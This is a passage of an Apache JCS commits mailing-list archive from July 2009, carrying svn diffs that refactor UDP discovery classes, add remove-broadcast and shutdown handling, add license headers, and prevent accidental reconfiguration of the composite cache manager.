multicastPort ); - m_localSocket.send( packet ); + if ( log.isDebugEnabled() ) + { + log.debug( "Sending DatagramPacket. bytes.length [" + bytes.length + "] to " + multicastAddress + ":" + multicastPort ); + } + + localSocket.send( packet ); } catch ( IOException e ) { @@ -159,6 +168,7 @@ /** * Ask other to broadcast their info the the multicast address. If a lateral is non receiving it * can use this. This is also called on startup so we can get info. + * <p> * @throws IOException */ public void requestBroadcast() @@ -170,13 +180,13 @@ } UDPDiscoveryMessage message = new UDPDiscoveryMessage(); - message.setRequesterId( LateralCacheInfo.listenerId ); + message.setRequesterId( UDPDiscoveryInfo.listenerId ); message.setMessageType( UDPDiscoveryMessage.REQUEST_BROADCAST ); send( message ); } /** - * This sends a message braodcasting our that the host and port is available for connections. + * This sends a message broadcasting our that the host and port is available for connections. * <p> * It uses the vmid as the requesterDI * @param host @@ -192,9 +202,10 @@ /** * This allows you to set the sender id. This is mainly for testing. + * <p> * @param host * @param port - * @param cacheNames + * @param cacheNames names of the cache regions * @param listenerId * @throws IOException */ @@ -214,10 +225,53 @@ message.setMessageType( UDPDiscoveryMessage.PASSIVE_BROADCAST ); send( message ); } + + /** + * This sends a message broadcasting our that the host and port is no longer available. + * <p> + * It uses the vmid as the requesterID + * <p> + * @param host host + * @param port port + * @param cacheNames names of the cache regions + * @throws IOException on error + */ + public void removeBroadcast( String host, int port, ArrayList cacheNames ) + throws IOException + { + removeBroadcast( host, port, cacheNames, LateralCacheInfo.listenerId ); + } + + /** + * This allows you to set the sender id. This is mainly for testing. + * <p> + * @param host host + * @param port port + * @param cacheNames names of the cache regions + * @param listenerId listener ID + * @throws IOException on error + */ + protected void removeBroadcast( String host, int port, ArrayList cacheNames, long listenerId ) + throws IOException + { + if ( log.isDebugEnabled() ) + { + log.debug( "sending removeBroadcast " ); + } + + UDPDiscoveryMessage message = new UDPDiscoveryMessage(); + message.setHost( host ); + message.setPort( port ); + message.setCacheNames( cacheNames ); + message.setRequesterId( listenerId ); + message.setMessageType( UDPDiscoveryMessage.REMOVE_BROADCAST ); + send( message ); + } } /** * This allows us to get the byte array from an output stream. + * <p> * @author asmuts * @created January 15, 2002 */ @@ -234,4 +288,3 @@ return buf; } } -// end class Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java ------------------------------------------------------------------------------ cvs2svn:cvs-rev = 1.3 Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java ------------------------------------------------------------------------------ svn:mergeinfo = Copied: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java (from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySenderThread.java) URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java?p2=jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java&p1=jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySenderThread.java&r1=781592&r2=794825&rev=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySenderThread.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java Thu Jul 16 20:14:42 2009 @@ -1,4 +1,4 @@ -package org.apache.jcs.auxiliary.lateral.socket.tcp.discovery; +package org.apache.jcs.utils.discovery; /* * Licensed to the Apache Software Foundation (ASF) under one @@ -33,17 +33,10 @@ /** The logger. */ private final static Log log = LogFactory.getLog( UDPDiscoverySenderThread.class ); - /** the UDP multicast port */ - private String discoveryAddress = ""; - - /** The port */ - private int discoveryPort = 0; - - /** the host and port we listen on for TCP socket connections */ - private String myHostName = null; - - /** The udp port */ - private int myPort = 0; + /** + * details of the host, port, and service being advertised to listen for TCP socket connections + */ + private UDPDiscoveryAttributes attributes; /** List of known regions. */ private ArrayList cacheNames = new ArrayList(); @@ -72,34 +65,27 @@ * Constructs the sender with the port to tell others to connect to. * <p> * On construction the sender will request that the other caches let it know their addresses. - * @param discoveryAddress host to broadcast to - * @param discoveryPort port to broadcast to - * @param myHostName host name we can be found at - * @param myPort port we are listening on - * @param cacheNames List of strings of the names of the regiond participating. + * @param attributes host, port, etc. + * @param cacheNames List of strings of the names of the region participating. */ - public UDPDiscoverySenderThread( String discoveryAddress, int discoveryPort, String myHostName, int myPort, - ArrayList cacheNames ) + public UDPDiscoverySenderThread( UDPDiscoveryAttributes attributes, ArrayList cacheNames ) { - this.discoveryAddress = discoveryAddress; - this.discoveryPort = discoveryPort; - - this.myHostName = myHostName; - this.myPort = myPort; + this.attributes = attributes; this.cacheNames = cacheNames; if ( log.isDebugEnabled() ) { - log.debug( "Creating sender thread for discoveryAddress = [" + discoveryAddress + "] and discoveryPort = [" - + discoveryPort + "] myHostName = [" + myHostName + "] and port = [" + myPort + "]" ); + log.debug( "Creating sender thread for discoveryAddress = [" + attributes.getUdpDiscoveryAddr() + + "] and discoveryPort = [" + attributes.getUdpDiscoveryPort() + "] myHostName = [" + + attributes.getServiceAddress() + "] and port = [" + attributes.getServicePort() + "]" ); } UDPDiscoverySender sender = null; try { // move this to the run method and determine how often to call it. - sender = new UDPDiscoverySender( discoveryAddress, discoveryPort ); + sender = new UDPDiscoverySender( attributes.getUdpDiscoveryAddr(), attributes.getUdpDiscoveryPort() ); sender.requestBroadcast(); if ( log.isDebugEnabled() ) @@ -137,9 +123,9 @@ { // create this connection each time. // more robust - sender = new UDPDiscoverySender( discoveryAddress, discoveryPort ); + sender = new UDPDiscoverySender( attributes.getUdpDiscoveryAddr(), attributes.getUdpDiscoveryPort() ); - sender.passiveBroadcast( myHostName, myPort, cacheNames ); + sender.passiveBroadcast( attributes.getServiceAddress(), attributes.getServicePort(), cacheNames ); // todo we should consider sending a request broadcast every so // often. @@ -152,7 +138,8 @@ } catch ( Exception e ) { - log.error( "Problem calling the UDP Discovery Sender [" + discoveryAddress + ":" + discoveryPort + "]", e ); + log.error( "Problem calling the UDP Discovery Sender [" + attributes.getUdpDiscoveryAddr() + ":" + + attributes.getUdpDiscoveryPort() + "]", e ); } finally { @@ -166,4 +153,43 @@ } } } + + /** + * Issues a remove broadcast to the others. + */ + protected void shutdown() + { + UDPDiscoverySender sender = null; + try + { + // create this connection each time. + // more robust + sender = new UDPDiscoverySender( attributes.getUdpDiscoveryAddr(), attributes.getUdpDiscoveryPort() ); + + sender.removeBroadcast( attributes.getServiceAddress(), attributes.getServicePort(), cacheNames ); + + if ( log.isDebugEnabled() ) + { + log.debug( "Called sender to issue a remove broadcast in shudown." ); + } + } + catch ( Exception e ) + { + log.error( "Problem calling the UDP Discovery Sender", e ); + } + finally + { + try + { + if ( sender != null ) + { + sender.destroy(); + } + } + catch ( Exception e ) + { + log.error( "Problem closing Remote Broadcast sender", e ); + } + } + } } Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java ------------------------------------------------------------------------------ cvs2svn:cvs-rev = 1.2 Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Propchange: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java ------------------------------------------------------------------------------ svn:mergeinfo = --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 16 20:15:54 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40747 invoked from network); 16 Jul 2009 20:15:54 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 20:15:54 -0000 Received: (qmail 31002 invoked by uid 500); 16 Jul 2009 20:16:59 -0000 Delivered-To: [email protected] Received: (qmail 30949 invoked by uid 500); 16 Jul 2009 20:16:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 30939 invoked by uid 500); 16 Jul 2009 20:16:59 -0000 Delivered-To: [email protected] Received: (qmail 30936 invoked by uid 500); 16 Jul 2009 20:16:59 -0000 Delivered-To: [email protected] Received: (qmail 30933 invoked by uid 99); 16 Jul 2009 20:16:59 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 20:16:59 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 20:16:57 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 398B423889D5; Thu, 16 Jul 2009 20:16:37 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r794826 - in /jakarta/jcs/trunk/src: java/org/apache/jcs/utils/discovery/ java/org/apache/jcs/utils/discovery/behavior/ test/org/apache/jcs/utils/discovery/ Date: Thu, 16 Jul 2009 20:16:36 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 16 20:16:36 2009 New Revision: 794826 URL: http://svn.apache.org/viewvc?rev=794826&view=rev Log: Adding license headers. Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + import java.io.Serializable; import java.util.ArrayList; Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + import java.util.HashSet; import java.util.Iterator; import java.util.Set; Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + /** * Configuration properties for UDP discover service. * <p> Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + import java.rmi.dgc.VMID; /** Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery.behavior; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + import org.apache.jcs.utils.discovery.DiscoveredService; /** Modified: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + import java.util.ArrayList; import java.util.List; Modified: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + import java.util.ArrayList; import junit.framework.TestCase; Modified: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java?rev=794826&r1=794825&r2=794826&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java Thu Jul 16 20:16:36 2009 @@ -1,5 +1,24 @@ package org.apache.jcs.utils.discovery; +/* + * Licensed to the Apache Software Foundation (ASF) under one + * or more contributor license agreements. See the NOTICE file + * distributed with this work for additional information + * regarding copyright ownership. The ASF licenses this file + * to you under the Apache License, Version 2.0 (the + * "License"); you may not use this file except in compliance + * with the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, + * software distributed under the License is distributed on an + * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY + * KIND, either express or implied. See the License for the + * specific language governing permissions and limitations + * under the License. + */ + import java.util.ArrayList; import java.util.Iterator; --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 16 20:39:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 48111 invoked from network); 16 Jul 2009 20:39:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 20:39:35 -0000 Received: (qmail 68169 invoked by uid 500); 16 Jul 2009 20:40:41 -0000 Delivered-To: [email protected] Received: (qmail 68122 invoked by uid 500); 16 Jul 2009 20:40:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 68112 invoked by uid 500); 16 Jul 2009 20:40:41 -0000 Delivered-To: [email protected] Received: (qmail 68109 invoked by uid 500); 16 Jul 2009 20:40:41 -0000 Delivered-To: [email protected] Received: (qmail 68106 invoked by uid 99); 16 Jul 2009 20:40:41 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 20:40:41 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 20:40:30 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 6AD9C23889DC; Thu, 16 Jul 2009 20:40:09 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r794842 - /jakarta/jcs/trunk/src/java/org/apache/jcs/engine/control/CompositeCacheManager.java Date: Thu, 16 Jul 2009 20:40:09 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 16 20:40:09 2009 New Revision: 794842 URL: http://svn.apache.org/viewvc?rev=794842&view=rev Log: Preventing accidental reconfiguration of composite cache manager. Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/engine/control/CompositeCacheManager.java Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/engine/control/CompositeCacheManager.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/engine/control/CompositeCacheManager.java?rev=794842&r1=794841&r2=794842&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/engine/control/CompositeCacheManager.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/engine/control/CompositeCacheManager.java Thu Jul 16 20:40:09 2009 @@ -80,7 +80,7 @@ /** Default cache attributes for this cache manager */ protected ICompositeCacheAttributes defaultCacheAttr = new CompositeCacheAttributes(); - /** Default elemeent attributes for this cache manager */ + /** Default element attributes for this cache manager */ protected IElementAttributes defaultElementAttr = new ElementAttributes(); /** Used to keep track of configured auxiliaries */ @@ -104,12 +104,18 @@ /** Should we use system property substitutions. */ private static final boolean DEFAULT_USE_SYSTEM_PROPERTIES = true; + /** Once configured, you can force a recofiguration of sorts. */ + private static final boolean DEFAULT_FORCE_RECONFIGURATION = false; + /** Those waiting for notification of a shutdown. */ private Set shutdownObservers = new HashSet(); /** Indicates whether shutdown has been called. */ private boolean isShutdown = false; + /** Indicates whether configure has been called. */ + private boolean isConfigured = false; + /** * Gets the CacheHub instance. For backward compatibility, if this creates the instance it will * attempt to configure it with the default configuration. If you want to configure from your @@ -290,48 +296,110 @@ */ public void configure( Properties props, boolean useSystemProperties ) { - if ( props != null ) + configure( props, useSystemProperties, DEFAULT_FORCE_RECONFIGURATION ); + } + + /** + * Configure from properties object, overriding with values from the system properteis if + * instructed. + * <p> + * You can override a specific value by passing in a ssytem property: + * <p> + * For example, you could override this value in the cache.ccf file by starting up your program + * with the argument: -Djcs.auxiliary.LTCP.attributes.TcpListenerPort=1111 + * <p> + * @param props + * @param useSystemProperties -- if true, values starting with jcs will be put into the props + * file prior to configuring the cache. + * @param forceReconfiguration - if the manager is already configured, we will try again. This + * may not work properly. + */ + public synchronized void configure( Properties props, boolean useSystemProperties, boolean forceReconfiguration ) + { + if ( props == null ) + { + log.error( "No properties found. Please configure the cache correctly." ); + return; + } + + if ( isConfigured ) { - if ( useSystemProperties ) + if ( !forceReconfiguration ) { - // override any setting with values from the system properties. - Properties sysProps = System.getProperties(); - Set keys = sysProps.keySet(); - Iterator keyIt = keys.iterator(); - while ( keyIt.hasNext() ) + if ( log.isDebugEnabled() ) { - String key = (String) keyIt.next(); - if ( key.startsWith( SYSTEM_PROPERTY_KEY_PREFIX ) ) - { - if ( log.isInfoEnabled() ) - { - log.info( "Using system property [[" + key + "] [" + sysProps.getProperty( key ) + "]]" ); - } - props.put( key, sysProps.getProperty( key ) ); - } + log.debug( "Configure called after the manager has been configured. " + + "Force reconfiguration is false. Doing nothing" ); } + return; } + else + { + if ( log.isInfoEnabled() ) + { + log.info( "Configure called after the manager has been configured. " + + "Force reconfiguration is true. Reconfiguring as best we can." ); + } + } + } + if ( useSystemProperties ) + { + overrideWithSystemProperties( props ); + } + doConfigure( props ); + } - // We will expose this for managers that need raw properties. - this.configurationProperties = props; - - // set the props value and then configure the ThreadPoolManager - ThreadPoolManager.setProps( props ); - ThreadPoolManager poolMgr = ThreadPoolManager.getInstance(); - if ( log.isDebugEnabled() ) + /** + * Any property values will be replaced with system property values that match the key. + * <p> + * TODO move to a utility. + * <p> + * @param props + */ + private static void overrideWithSystemProperties( Properties props ) + { + // override any setting with values from the system properties. + Properties sysProps = System.getProperties(); + Set keys = sysProps.keySet(); + Iterator keyIt = keys.iterator(); + while ( keyIt.hasNext() ) + { + String key = (String) keyIt.next(); + if ( key.startsWith( SYSTEM_PROPERTY_KEY_PREFIX ) ) { - log.debug( "ThreadPoolManager = " + poolMgr ); + if ( log.isInfoEnabled() ) + { + log.info( "Using system property [[" + key + "] [" + sysProps.getProperty( key ) + "]]" ); + } + props.put( key, sysProps.getProperty( key ) ); } + } + } - // configure the cache - CompositeCacheConfigurator configurator = new CompositeCacheConfigurator( this ); + /** + * Configure the cache using the supplied properties. + * <p> + * @param props assumed not null + */ + private void doConfigure( Properties props ) + { + // We will expose this for managers that need raw properties. + this.configurationProperties = props; - configurator.doConfigure( props ); - } - else + // set the props value and then configure the ThreadPoolManager + ThreadPoolManager.setProps( props ); + ThreadPoolManager poolMgr = ThreadPoolManager.getInstance(); + if ( log.isDebugEnabled() ) { - log.error( "No properties found. Please configure the cache correctly." ); + log.debug( "ThreadPoolManager = " + poolMgr ); } + + // configure the cache + CompositeCacheConfigurator configurator = new CompositeCacheConfigurator( this ); + + configurator.doConfigure( props ); + + isConfigured = true; } /** @@ -727,6 +795,22 @@ } /** + * @return the isShutdown + */ + public boolean isShutdown() + { + return isShutdown; + } + + /** + * @return the isConfigured + */ + public boolean isConfigured() + { + return isConfigured; + } + + /** * Called on shutdown. This gives use a chance to store the keys and to optimize even if the * cache manager's shutdown method was not called manually. */ @@ -740,7 +824,7 @@ */ public void run() { - if ( !isShutdown ) + if ( !isShutdown() ) { log.info( "Shutdown hook activated. Shutdown was not called. Shutting down JCS." ); shutDown(); --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jul 20 21:04:25 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 45471 invoked from network); 20 Jul 2009 21:04:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with 